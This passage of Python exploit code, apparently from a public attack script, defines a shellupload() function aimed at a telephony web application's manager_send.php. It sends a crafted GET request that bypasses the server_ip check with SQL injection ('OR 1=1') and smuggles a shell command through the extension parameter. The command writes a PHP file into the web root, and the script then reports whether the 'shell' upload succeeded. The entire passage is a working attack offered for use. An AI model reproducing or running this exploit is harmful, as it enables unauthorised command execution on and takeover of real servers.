33 | def shellupload(): |
34 | command = "echo 'Infogen-AL<br />' > /var/www/html/infogen.php" |
35 | |
36 | command = command.replace(" ", "%20") |
37 | evil = path + '/manager_send.php?enable_sipsak_messages=1&allow_sipsak_messages=1&protocol=sip&ACTION=OriginateVDRelogin&session_name=AAAAAAAAAAAA&server_ip=%27%20OR%20%271%27%20%3D%20%271&extension=%3B' + command + '%3B&user=' + user + '&pass=' + password |
38 | s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) |
39 | s.connect((host,80)) |
40 | evilREQ = 'GET ' + evil + ' HTTP/1.1' + CRLF + 'Host: ' + host + CRLF + 'User-Agent: Infogen-AL' + CRLF + CRLF + CRLF |
41 | s.send(evilREQ) |
42 | a = s.recv(1024) |
43 | if(a.find("HTTP/1.1 200 OK") != -1 and a.find("Invalid") == -1): |
44 | print '[ + ] Shell uploaded successfully [ + ]\n' |
45 | print '[ + ] http://' + host + '/infogen.php [ + ]\n' |
46 | else: |
47 | print '[ - ] Shell upload failed.... [ - ]' |
48 | s.close() |